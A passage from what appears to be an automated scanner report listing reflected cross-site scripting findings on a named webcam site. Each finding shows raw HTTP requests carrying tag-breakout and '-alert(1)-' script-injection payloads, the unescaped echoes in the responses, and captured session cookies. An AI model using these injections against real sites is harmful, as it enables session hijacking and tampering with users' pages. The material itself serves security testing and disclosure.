GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:44 GMT Connection: close Content-Length: 40363 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.66. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:01 GMT Connection: close Content-Length: 40531 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve ...[SNIP]...
2.67. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/adult-shows/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:35 GMT Connection: close Content-Length: 25631 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.68. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/adult-shows/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:40 GMT Connection: close Content-Length: 25778 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.69. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:35 GMT Connection: close Content-Length: 226523 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1"> ...[SNIP]...
2.70. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:10 GMT Connection: close Content-Length: 225335 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.71. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:10 GMT Connection: close Content-Length: 27644 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.72. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/cam-girls/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:19 GMT Connection: close Content-Length: 27791 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a ...[SNIP]...
2.73. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/cams-aroundthehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; 